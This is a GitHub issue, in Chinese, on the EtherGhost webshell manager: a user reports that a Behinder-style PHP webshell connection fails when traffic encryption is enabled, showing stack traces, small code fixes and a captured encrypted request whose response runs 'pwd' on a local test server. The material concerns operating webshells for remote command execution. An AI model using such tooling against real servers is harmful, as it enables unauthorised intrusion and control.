Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

冰蝎马,勾选加密流量功能失效 #14

Open
yihijof407 opened this issue Jan 17, 2025 · 1 comment
Open

冰蝎马,勾选加密流量功能失效 #14

yihijof407 opened this issue Jan 17, 2025 · 1 comment

Comments

@yihijof407
Copy link

安装最新版
环境 php 8.0.1 和 8.4.1 https://github.com/IshtarStar/docker-compose-nginx-phpfpm

马为https://github.com/Marven11/EtherGhost/blob/main/test_environment/behinder.php
默认配置,连接报错如下

  File "/home/kali/EtherGhost/ether_ghost/core/php_session_common.py", line 1360, in submit_unwrapped
    status_code, text = await self.submit_http(payload_encoded)
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/EtherGhost/ether_ghost/sessions/php_behinder.py", line 131, in submit_http
    data = behinder_aes(payload, self.key)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/EtherGhost/ether_ghost/sessions/php_behinder.py", line 55, in behinder_aes
    payload_padded = pad(payload, AES.block_size)
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/EtherGhost/env/lib/python3.12/site-packages/Crypto/Util/Padding.py", line 64, in pad
    return data_to_pad + padding
           ~~~~~~~~~~~~^~~~~~~~~
TypeError: can only concatenate str (not "bytes") to str

payload_padded = pad(payload, AES.block_size)改为payload_padded = pad(payload_bytes, AES.block_size)后,再次连接,报错如下

gqitoa<br />
<b>Fatal error</b>:  Uncaught TypeError: count(): Argument #1 ($var) must be of type Countable|array, null given in /var/www/html/index.php(24) : eval()'d code(1) : eval()'d code:1
Stack trace:
#0 /var/www/html/index.php(24) : eval()'d code(1) : eval()'d code(1): decoder_echo('lwogpazqaxtz')
#1 /var/www/html/index.php(24) : eval()'d code(1): eval()
#2 /var/www/html/index.php(24): eval()
#3 /var/www/html/index.php(25): C-&gt;__invoke('eval(base64_dec...')
#4 {main}
  thrown in <b>/var/www/html/index.php(24) : eval()'d code(1) : eval()'d code</b> on line <b>1</b><br />

修改for($i = 0; $i < count($eg_decoder_hooks); $i ++) {{ for($i = 0; $i < count($eg_decoder_hooks ?? []); $i ++) {{
功能正常,但勾选流量加密后失效
请求、响应如下

GET /session/bc28ec3f-5e88-4920-98e6-8a67a16b2e5d/execute_cmd?cmd=pwd HTTP/1.1

{"code":-600,"msg":"受控端输出错误: 解密失败"}

POST / HTTP/1.1
Host: localhost
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3
Cookie: PHPSESSID=07d1e64014c5676836b54b4e76de668c
Content-Length: 2688



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

HTTP/1.1 200 OK
Server: nginx/1.27.3
Date: Fri, 17 Jan 2025 01:48:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/8.0.1
Set-Cookie: PHPSESSID=07d1e64014c5676836b54b4e76de668c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 26


qnzbfj/var/www/html
faywun
Marven11 added a commit that referenced this issue Jan 17, 2025
@Marven11
Fix bug for #14
8978e1e
@Marven11
Copy link
Owner

修了,下个版本发

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@Marven11 @yihijof407